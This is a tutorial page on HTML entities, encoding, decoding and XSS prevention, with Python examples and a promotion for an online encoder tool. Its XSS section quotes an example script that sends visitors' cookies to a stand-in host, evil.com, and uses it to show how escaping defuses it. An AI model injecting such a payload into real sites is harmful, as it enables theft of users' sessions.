What Are HTML Entities?
An HTML entity is a text string that begins with an ampersand (&) and ends with a semicolon (;). The browser replaces the entity with the corresponding character when it renders the page. For example, &lt; becomes a less-than sign (<) and &copy; becomes the copyright symbol (©).
Entities were critical in early web development when character encoding was inconsistent across systems. Today, with UTF-8 as the universal standard, they are still necessary for the five characters that have structural meaning in HTML, and remain useful for typographic and mathematical symbols.
There are three forms of HTML entity references:
- Named entities: human-readable names like &amp;, &lt;, and &nbsp;
- Decimal numeric references: the Unicode code point in decimal, such as &#169; for ©
- Hexadecimal numeric references: the Unicode code point in hex, such as &#xA9; for ©
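As a quick check that the three forms are interchangeable, here is a minimal Python sketch. It assumes the standard library's html.unescape as the decoder; the variable names are illustrative only.

```python
import html

# The same character, U+00A9, written in all three reference forms.
forms = ["&copy;", "&#169;", "&#xA9;"]

# html.unescape resolves named, decimal, and hexadecimal references alike.
decoded = [html.unescape(form) for form in forms]
print(decoded)  # ['©', '©', '©']

# 169 in decimal and A9 in hexadecimal name the same code point.
same_code_point = ord("©") == 169 == 0xA9
print(same_code_point)  # True
```

Whichever form appears in the source, the decoded result is the same single character.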
The Five Characters You Must Always Encode
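These characters have structural meaning in HTML and should be escaped whenever they appear as content rather than markup. Strictly speaking, the two quote characters only need escaping inside attribute values, but escaping all five everywhere is a safe default: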
| Character | Named Entity | Numeric | Description |
|---|---|---|---|
| < | &lt; | &#60; | Less-than / tag open |
| > | &gt; | &#62; | Greater-than / tag close |
| & | &amp; | &#38; | Ampersand / entity start |
| " | &quot; | &#34; | Double quote / attribute delimiter |
| ' | &apos; | &#39; | Single quote / attribute delimiter |
Omitting these escapes does not always cause a visible problem, but it can break page structure or, more critically, open security holes.
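To see the five escapes applied in one pass, here is a short sketch using Python's standard html.escape. The sample string is made up for illustration. Note that Python writes the single quote as the hexadecimal reference &#x27;, which is equivalent to &#39; and &apos;.

```python
import html

# Sample text containing all five structural characters.
raw = '<a href="/search?q=1&page=2">Tom & Jerry\'s</a>'

# quote=True (the default) also escapes " and ', which matters in attribute values.
escaped = html.escape(raw, quote=True)
print(escaped)
# &lt;a href=&quot;/search?q=1&amp;page=2&quot;&gt;Tom &amp; Jerry&#x27;s&lt;/a&gt;

# Decoding restores the original text exactly.
round_trip = html.unescape(escaped)
```

The ampersand is replaced first, so the entities produced for the other characters are not escaped a second time.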
Common Named HTML Entities Reference
Beyond the mandatory five, many named entities exist for typographic and mathematical use:
- &nbsp;: non-breaking space (prevents line wrap between words)
- &copy; (©): copyright symbol
- &reg; (®): registered trademark
- &trade; (™): trademark symbol
- &mdash; (—): em dash (used in punctuation)
- &ndash; (–): en dash (used in ranges like "2020–2026")
- &hellip; (…): horizontal ellipsis
- &euro; (€): euro sign
- &pound; (£): pound sterling
- &yen; (¥): yen sign
- &laquo; and &raquo; (« »): guillemets (French quotation marks)
- &infin; (∞): infinity symbol
- &alpha; (α): Greek letter alpha
Named entities are defined in the HTML specification and are universally supported. If a name doesn't exist in the spec, use a numeric reference instead.
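The fallback rule above can be sketched in a few lines of Python. The helper name to_reference is hypothetical, and the lookup table used here (html.entities.codepoint2name) only covers the HTML 4.01 names, so it is narrower than the full HTML specification list.

```python
from html.entities import codepoint2name


def to_reference(ch: str) -> str:
    """Return a named reference if one is known, else a decimal numeric one.

    Hypothetical helper for illustration; codepoint2name holds only the
    HTML 4.01 entity names, not the complete HTML5 set.
    """
    name = codepoint2name.get(ord(ch))
    if name is not None:
        return f"&{name};"
    return f"&#{ord(ch)};"


print(to_reference("©"))  # &copy;
print(to_reference("☃"))  # &#9731;  (no named entity, so numeric fallback)
```

A numeric reference is available for any Unicode code point, which is why it serves as the fallback.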
HTML Encoding and Web Security (XSS Prevention)
One of the most important practical uses of HTML encoding is preventing Cross-Site Scripting (XSS) attacks. XSS occurs when an attacker injects malicious HTML or JavaScript into a web page that other users view.
Consider a comment form where a user submits:
<script>document.location='https://evil.com/?c='+document.cookie</script>
If the server inserts this directly into the HTML, the script runs in every visitor's browser and steals their cookies. But if the server HTML-encodes the input first, the output becomes:
&lt;script&gt;document.location=&#39;https://evil.com/?c=&#39;+document.cookie&lt;/script&gt;
The browser displays the text literally instead of executing it. Encoding user-supplied content before output is a core defense recommended in OWASP's guidance on preventing XSS, a risk class covered by the OWASP Top 10, and it should be applied consistently in every web application.
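A minimal sketch of that server-side step, assuming Python and its standard html.escape. The function name render_comment and the surrounding markup are hypothetical. Python emits the single quote as &#x27;, which browsers treat the same as &#39;.

```python
import html


def render_comment(comment: str) -> str:
    # Hypothetical helper: escape the untrusted text, then wrap it in trusted markup.
    return f'<p class="comment">{html.escape(comment)}</p>'


payload = "<script>document.location='https://evil.com/?c='+document.cookie</script>"
page_fragment = render_comment(payload)
print(page_fragment)
```

The printed fragment contains no literal script tag, so the browser shows the payload as text. This covers text placed in element content; values placed inside script blocks, URLs, or CSS need escaping rules specific to those contexts.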
If you work with URL parameters, you may also need URL encoding, which is a separate but related escaping mechanism for query strings.
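The two mechanisms often stack: a value is URL-encoded to build the query string, and the finished URL is then HTML-encoded when it goes into an attribute. The sketch below assumes Python's urllib.parse.urlencode and html.escape; the /search path and parameter names are invented for illustration.

```python
import html
from urllib.parse import urlencode

# Step 1: URL-encode the parameter value so & and < cannot split the query string.
query = urlencode({"q": "Tom & Jerry <3"})
print(query)  # q=Tom+%26+Jerry+%3C3

# Step 2: HTML-encode the whole URL before placing it in an attribute.
url = f"/search?{query}&page=2"
link = f'<a href="{html.escape(url)}">results</a>'
print(link)  # <a href="/search?q=Tom+%26+Jerry+%3C3&amp;page=2">results</a>
```

The ampersand inside the value becomes %26, while the ampersand that separates parameters becomes &amp; in the markup.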
HTML Decoding: Converting Entities Back to Characters
Decoding is the reverse process: converting entity references back into their original characters. You might need decoding when you are:
- Parsing HTML content with a script and need the plain text
- Handling an API response that contains HTML-encoded strings inside JSON
- Copying content from a web page that has been double-encoded
- Troubleshooting why symbols appear as entity codes on a web page
In a browser environment, a simple technique is to create a textarea element, set its innerHTML to the encoded string, and read back its value. Server-side languages have built-in functions: PHP's html_entity_decode(), Python's html.unescape(), and Node.js libraries like he.
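For the server-side case, here is a short sketch using Python's html.unescape, including the double-encoded situation mentioned in the list above. The sample strings are made up.

```python
import html

# Named, decimal, and hexadecimal references are all resolved in one call.
text = html.unescape("Fish &amp; chips &copy; 2024, &#8364;5 or &#x20AC;5")
print(text)  # Fish & chips © 2024, €5 or €5

# A double-encoded string needs two passes: each pass removes one layer.
double_encoded = "&amp;lt;b&amp;gt;"
once = html.unescape(double_encoded)
twice = html.unescape(once)
print(once)   # &lt;b&gt;
print(twice)  # <b>
```

If entity codes still show up after one decode, the content was probably encoded twice somewhere upstream, and fixing that source is usually better than decoding repeatedly.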
Named Entities vs. Numeric References: Which Should You Use?
Both named and numeric references are valid, but the choice matters for readability and portability:
- Use named entities for the common characters (&amp;, &lt;, &gt;, &nbsp;, &copy;, &mdash;) where the name is widely known and easy to remember.
- Use numeric references for any character that doesn't have a named entity, or for obscure symbols where the name would be unknown to readers.
- Prefer UTF-8 literal characters for anything that doesn't need escaping: modern HTML5 documents with <meta charset="UTF-8"> can contain any Unicode character directly.
When writing content management systems or templating engines, always HTML-encode dynamic content automatically rather than relying on developers to do it manually. Template engines like Twig and Handlebars escape output by default for this reason; Jinja2 does the same once autoescaping is enabled, which frameworks such as Flask turn on for HTML templates.
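The "escape by default" idea can be illustrated with a toy renderer built on Python's standard library. This is a sketch of the design principle, not how any of the engines named above are implemented; the names Trusted and render are hypothetical.

```python
import html
from string import Template


class Trusted(str):
    """Hypothetical marker for markup the developer has explicitly vetted."""


def render(template: str, **values: object) -> str:
    # Every value is escaped unless it was deliberately wrapped in Trusted.
    prepared = {
        key: value if isinstance(value, Trusted) else html.escape(str(value))
        for key, value in values.items()
    }
    return Template(template).substitute(prepared)


out = render(
    "<li>$name said: $body</li>",
    name="Ann <admin>",
    body=Trusted("<em>hi</em>"),
)
print(out)  # <li>Ann &lt;admin&gt; said: <em>hi</em></li>
```

Making escaping the default means a forgotten step fails safe: unescaped output only happens when someone opts in on purpose.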
How to Use the ToolsBox HTML Encoder / Decoder
The ToolsBox HTML Encoder / Decoder handles both directions instantly:
- Encoding: paste plain text or HTML source containing special characters. The tool converts <, >, &, ", and ' to their entity equivalents.
- Decoding: paste a string containing entity references. The tool converts them back to their original characters.
- Results are available to copy with a single click.
This is especially useful for pasting code samples into blog posts, sanitizing content before storage, or debugging double-encoded strings. You might also find the Base64 Encoder / Decoder helpful when working with binary data in web contexts.
Frequently Asked Questions
What is the difference between &amp; and &#38;?
Both represent the ampersand character (&). &amp; is the named entity reference, while &#38; is the decimal numeric character reference and &#x26; is the hexadecimal form. All three produce identical output in a browser; named entities are easier to read.
Do I have to encode all special characters in HTML?
No. In modern UTF-8 HTML documents you need to encode only the five characters that have special meaning in HTML markup: < > & " and '. Other Unicode characters can appear as literal UTF-8 text as long as the document charset is declared correctly.
What is HTML encoding used for in security?
HTML encoding is a primary defense against Cross-Site Scripting (XSS) attacks. By converting characters like < and > into their entity equivalents before inserting user-supplied text into a web page, you prevent the browser from interpreting that text as executable HTML or JavaScript.
How do I decode HTML entities in a string?
Paste the encoded HTML string into the ToolsBox HTML Encoder / Decoder and click Decode. The tool converts all named and numeric entity references back into their original characters instantly.